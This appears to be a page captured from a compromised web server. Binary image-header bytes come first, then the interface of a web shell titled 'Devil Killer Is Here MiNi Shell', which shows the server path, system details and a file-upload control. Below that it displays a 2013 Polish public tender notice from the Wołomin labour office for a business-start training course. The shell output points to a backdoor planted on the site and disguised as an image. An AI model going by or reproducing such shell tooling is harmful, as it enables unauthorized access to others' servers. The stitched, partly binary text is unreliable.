JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131219/276779-N-2013.html

<p class="kh_header"><b>Wołomin: Krok po kroku do własnej firmy</b><br>
<b>Numer ogłoszenia: 276779 - 2013; data zamieszczenia: 19.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Wołominie , ul. Warszawska 5a, 05-200 Wołomin, woj. mazowieckie, tel. 0-22 787 54 64/65, faks 0-22 787 54 64/65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.wolomin.pl; www.bip.pup.wolomin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Krok po kroku do własnej firmy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest organizacja  i prowadzenie usługi szkolenia Krok po kroku do własnej firmy dla 195 osób bezrobotnych z terenu powiatu wołomińskiego, finansowane w 100% ze środków publicznych.
Wymagania szczególne:
1.	Przeprowadzenie i organizacja kursu Krok po kroku do własnej firmy dla 195 osób bezrobotnych, w tym:
-	Zadanie częściowe nr 1 - 105 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Wołominie (7 grup po 15 osób każda),
-	Zadanie częściowe nr 2 - 45 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Wołominie (3 grupy po 15 osób każda),
-	Zadanie częściowe nr 3 - 45 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Wołominie (3 grupy po 15 osób każda).
2.	Miejsce kursu:
-	Zadanie częściowe nr 1: teren miasta Wołomin,
-	Zadanie częściowe nr 2: teren miasta Radzymin,
-	Zadanie częściowe nr 3: teren miasta Tłuszcz.
3.	Wymagana ilość godzin zajęć: 56 godzin na 1 osobę.
4.	Realizacja kursu w terminie: I-XI.2014r.
5.	Kurs powinien być realizowany według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu.
6.	Za godzinę zegarową kursu należy przyjąć 60 minut, co obejmuje zajęcia lekcyjne 
45 minut oraz przerwę 15 minut, ilość i długość przerw może być ustalana wg uznania Wykonawcy.
7.	Zajęcia powinny odbywać się od poniedziałku do piątku w przedziale godzinowym 
od 800 do 1800.
8.	Wykonawca zapewni każdemu uczestnikowi na własność: podręczniki-książki (oryginalne wydawnictwa) z zakresu tematyki zajęć, notatnik (format A4, twarda oprawa), długopis. Nie dopuszcza się sporządzania kserokopii podręczników.
9.	Wykonawca ubezpieczy od następstw nieszczęśliwych wypadków uczestników kursu 
w drodze na kurs i z powrotem oraz w trakcie jego trwania:
	- uprawnionych do zasiłku - od dnia rozpoczęcia kursu, przez okres przysługiwania zasiłku,
	- uprawnionych do stypendium - w przypadku zaistnienia sytuacji podjęcia zatrudnienia, innej pracy zarobkowej lub działalności gospodarczej, o ile uczestnik kontynuować będzie kurs - od dnia uzyskania informacji o zaistnieniu jednej z ww. okoliczności 
do zakończenia kursu,
	- w przypadku nabycia przez uczestnika kursu uprawnień do pobierania zasiłku 
w trakcie jego odbywania - od dnia nabycia prawa do zasiłku przez okres przysługiwania zasiłku.
	W przypadku wystąpienia ww. sytuacji Zamawiający przekaże, najpóźniej 1 dzień przed rozpoczęciem kursu lub w chwili wystąpienia ww. sytuacji, niezbędne dane 
do ubezpieczenia od NNW.
	Koszt dzienny ubezpieczenia 1 osoby od NNW Wykonawca poda w kalkulacji kosztów.
	W przypadku wystąpienia ww. sytuacji zostanie sporządzony stosowny aneks do umowy uwzględniający koszt ubezpieczenia NNW osób nim objętych.
10.	Miejsce przeprowadzenia kursu powinno być przystosowane do zajęć pod względem sanitarnym, przeciwpożarowym i bhp.
11.	W trakcie zajęć wymagających obsługi komputera wykonawca zapewnia każdemu uczestnikowi samodzielne stanowisko do zajęć komputerowych wyposażone w sprzęt 
i oprogramowanie niezbędne do prawidłowego przeprowadzenia programu kursu.
12.	Wykonawca zobowiązany jest do przeprowadzenia anonimowej ankiety wśród uczestników kursu w ostatnim dniu kursu, a także sporządzenie raportu z wyniku raportowania.
13.	W trakcie zajęć wykonawca zapewni każdemu uczestnikowi szkolenia serwis kawowy,              tj.: na 1 uczestnika dziennie min. 20 dkg ciasteczek (w tym min. 10 dkg ciastek 
w polewie czekoladowej), min. 250 ml wody gazowanej butelkowanej, min. 250 ml wody niegazowanej butelkowanej, min. 250 ml herbaty, min. 250 ml kawy oraz  cukier, słodzik, mleczko do kawy i naczynia do napojów. Produkty muszą być na bieżąco uzupełniane 
w miarę ich spożycia, bądź wymieniane z powodu upływu terminu ich ważności.
14.	Kurs zakończy się wydaniem:
-	zaświadczenia o ukończeniu kursu - przygotowanego wg wzoru zgodnego                                     z Rozporządzeniem Ministra Edukacji Narodowej z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. poz. 186) wraz 
z uzupełnieniem w postaci suplementu zawierającego: okres trwania szkolenia, tematy 
i wymiary godzin zajęć edukacyjnych, numer z rejestru zaświadczeń, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie oraz zapis Kurs zrealizowany na zlecenie Powiatowego Urzędu Pracy w Wołominie 
i opatrzony w loga Powiatowego Urzędu Pracy i Powiatu Wołomińskiego (loga powinny być umieszczone w jednej linii, najlepiej u dołu strony i powinny być tych samych rozmiarów), (UWAGA! Powyższe zaświadczenie nie jest obligatoryjne i może je wystawić tylko Wykonawca, który ma do tego uprawnienia), lub
-	zaświadczenia, certyfikatu, innego dokumentu potwierdzającego ukończenie kursu, zawierającego: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia (a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość), nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę 
i nazwę szkolenia, miejsce i datę wydania zaświadczenia lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć, podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie (Rozporządzenie Ministra Pracy i Polityki Społecznej 
z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy - Dz. U. z 2010r. Nr 177, poz. 1193) oraz zapis (Kurs zrealizowany na zlecenie Powiatowego Urzędu Pracy w Wołominie) i opatrzony w loga Powiatowego Urzędu Pracy i Powiatu Wołomińskiego (loga powinny być umieszczone w jednej linii, najlepiej 
u dołu strony  i powinny być tych samych rozmiarów).
Celem kursu jest przyswojenie przez uczestników zagadnień niezbędnych 
do założenia i prowadzenia własnej działalności gospodarczej. Tematyka zajęć powinna obejmować:
-	podstawową znajomość obsługi komputera - 12 godzin,
-	warunki prowadzenia działalności gospodarczej, czyli etapy rejestracji firmy, podatki, ubezpieczenia społeczne, prawne aspekty funkcjonowania firmy - 10 godzin,
-	warsztaty z planowania działalności gospodarczej pod kątem praktycznego przygotowania biznes planu, który będzie elementem egzaminu końcowego 
- 24godziny,
-	zagadnienia z zakresu prowadzenia księgowości małej firmy, w tym wystawianie faktur - 10 godzin..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, 
o których mowa w art. 67, ust. 1, pkt. 6 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych (Dz. U. z 2013r., poz. 907, 984, 1047).</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O zamówienie mogą ubiegać się wykonawcy, którzy spełniają warunki udziału               w postępowaniu (art. 22 PZP):
1.	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, a w szczególności:
a)	uzyskali wpis do rejestru instytucji szkoleniowych prowadzony przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej - art. 20 ustawy z 20.04.2004 o promocji zatrudnienia                            i instytucjach rynku pracy (Dz. U. z 2013r., poz. 674 z późn. zm.),
2.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej należyte wykonanie zamówienia,
3.	są ubezpieczeni od odpowiedzialności cywilnej z zakresu prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50.000 zł,
4.	przedstawią rodzaj i wzór dokumentów potwierdzających ukończenie kursu,
5.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, co oznacza, że:
a)	w ciągu ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonawca zrealizował z należytą starannością przynajmniej 3 szkolenia grupowe minimum              15-osobowe, o liczbie godzin min. 50, z zakresu objętego przedmiotowym zamówieniem,
b)	dysponują lub będą dysponować co najmniej jedną salą dydaktyczną                         o powierzchni co najmniej 40 m2 dla każdego z zadań częściowych,
c)	dysponują lub będą dysponować co najmniej 15 stanowiskami komputerowymi wyposażonymi w sprzęt i oprogramowanie niezbędne do prawidłowego przeprowadzenia szkolenia,
d)	dysponują lub będą dysponować co najmniej 3 osobami posiadającymi minimum roczny staż pracy dydaktycznej związanej z przedmiotem zamówienia,
6. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych       (Dz. U. z 2013r., poz. 907, 984, 1047).

W toku dokonywania oceny złożonych ofert zamawiający może żądać udzielenia przez wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert.

Zamawiający wezwie wykonawców, zgodnie z art. 26 ust. 3 ustawy Prawo zamówień publicznych, którzy w wyznaczonym terminie nie złożyli dokumentów potwierdzających spełnienie warunków udziału w postępowaniu, do uzupełnienia tych dokumentów                 w określonym terminie, jeżeli ich nie uzupełnienie skutkowałoby unieważnieniem postępowania.

Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w złożonych dokumentach                   i oświadczeniach. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy. Ofertę  wykonawcy wykluczonego uznaje się za odrzuconą. Zamawiający zawiadomi niezwłocznie wykonawcę o wykluczeniu z postępowania, podając uzasadnienie faktyczne i prawne.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Liczba przeprowadzonych szkoleń w ciągu ostatnich 3 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonawca zrealizował z należytą starannością przynajmniej 3 szkolenia grupowe minimum              15-osobowe, o liczbie godzin min. 50, z zakresu objętego przedmiotowym zamówieniem.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta musi zawierać następujące oświadczenia i dokumenty w formie oryginałów lub kserokopii. Dokumenty złożone w formie kserokopii muszą być opatrzone klauzulą  ZA ZGODNOŚĆ Z ORYGINAŁEM i poświadczone przez Wykonawcę:
1.	wypełniony druk FORMULARZ OFERTY - załącznik Nr 1a, b ,c do SIWZ,
2.	oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 oraz braku podstaw do wykluczenia art. 24 ust. 1 i 2 ustawy z dnia 29.01.2004r. Prawo zamówień publicznych (Dz. U. z 2013r., poz. 907, 984, 1047).- załącznik Nr 1 do Oferty,
3.	aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wskazania braku podstaw do wykluczenia w oparciu             o art. 24 ust. 1 pkt. 2 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału                      w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy,
4.	zaświadczenie z Urzędu Skarbowego o nie zaleganiu w płaceniu podatków (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
5.	zaświadczenie z ZUS o bieżącym opłacaniu składek na ubezpieczenie społeczne (wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert),
6.	oświadczenie dotyczące akceptacji warunków postępowania, projektu umowy   i zapoznania się z treścią SIWZ - załącznik Nr 2 do Oferty,
7.	wykaz wykonanych głównych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których zostały wykonane - załącznik Nr 3 do Oferty, wraz z załączeniem dowodów, czy zostały wykonane należycie.
Dowodami potwierdzającymi czy usługi zostały wykonane należycie są:
- poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert,
- oświadczenie wykonawcy  - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej. Jeśli wykonawca składa oświadczenie, zobowiązany jest podać przyczyny braku możliwości uzyskania poświadczenia.
8.	wykaz niezbędnej do wykonania zamówienia bazy lokalowej i sprzętowej, którymi dysponuje lub będzie dysponował wykonawca - załącznik Nr 4 do Oferty,
9.	pisemne zobowiązanie innych podmiotów do udostępnienia niezbędnej                   do wykonania zamówienia bazy lokalowej i sprzętowej, jeżeli w wykazie,             o którym mowa w pkt 8 wykonawca wskazał bazy, którymi będzie dysponował,
10.	wykaz osób, które będą uczestniczyć w realizacji zamówienia,                               z wyszczególnieniem wykonywanych przez nie czynności - załącznik Nr 5 do Oferty, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia  i wykształcenia, niezbędnych do wykonania zamówienia.

Inne dokumenty, które powinna zawierać oferta przetargowa :

11.	oświadczenie, że wpis do rejestru instytucji szkoleniowych właściwego wojewódzkiego urzędu pracy został zaktualizowany na 2013r. - załącznik        Nr 3 do SIWZ,
12.	program szkolenia - załącznik Nr 6 do Oferty,
13.	kosztorys ofertowy - załącznik Nr 7 do Oferty,
14.	oświadczenie o powiązaniu kapitałowym - załącznik Nr 8 do Oferty,
15.	upoważnienie do pozyskania danych gospodarczych - załącznik Nr 9 do Oferty,
16.	wzór dokumentów potwierdzających ukończenie szkolenia do akceptacji przez Zamawiającego zgodny z pkt III ppkt 14 SIWZ,
17.	pełnomocnictwo, gdy wykonawcę reprezentuje pełnomocnik,
18.	opłacona polisa, a w przypadku jej braku inny dokument potwierdzający,         że wykonawca jest ubezpieczony od odpowiedzialności cywilnej z zakresu prowadzonej działalności związanej z przedmiotem zamówienia,
19.	wzór ankiety dla uczestników szkolenia służącej do oceny szkolenia,
20.	oświadczenie o realizacji programu szkolenia nie krócej niż 25 godzin tygodniowo.

Jeżeli Oferent składa dokumenty na więcej niż jedno zadanie częściowe zobowiązany jest                   do przedłożenia załączników nr 1 do SIWZ oraz nr 4, 5 i 7 do Oferty oddzielnie do każdego zadania częściowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Doświadczenie instytucji szkoleniowej w zakresie przedmiotu zamówienia - 20</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.wolomin.pl; www.bip.pup.wolomin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Wołominie, ul. Warszawska 5a, 05-200 Wołomin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.12.2013 godzina 09:00, miejsce: Powiatowy Urząd Pracy w Wołominie, ul. Warszawska 5a, 05-200 Wołomin, pok. nr 10..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Krok po kroku do własnej firmy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia Krok po kroku do własnej firmy dla 105 osób bezrobotnych zarejestrowanych w Powiatowym Urzędzie Pracy w Wołominie (7 grup po 15 osób każda), teren miasta Wołomin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie instytucji szkoleniowej w zakresie przedmiotu zamówienia - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Krok po kroku do własnej firmy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia Krok po kroku do własnej firmy dla 45 osób bezrobotnych (3 grupy po 15 osób) zarejestrowanych w Powiatowym Urzędzie Pracy w Wołominie, teren miasta Radzymin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.20.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Doświadczenie instytucji szkoleniowej w zakresie przedmiotu zamówienia - 20</li>
</ul>
</li>
</ul><br>
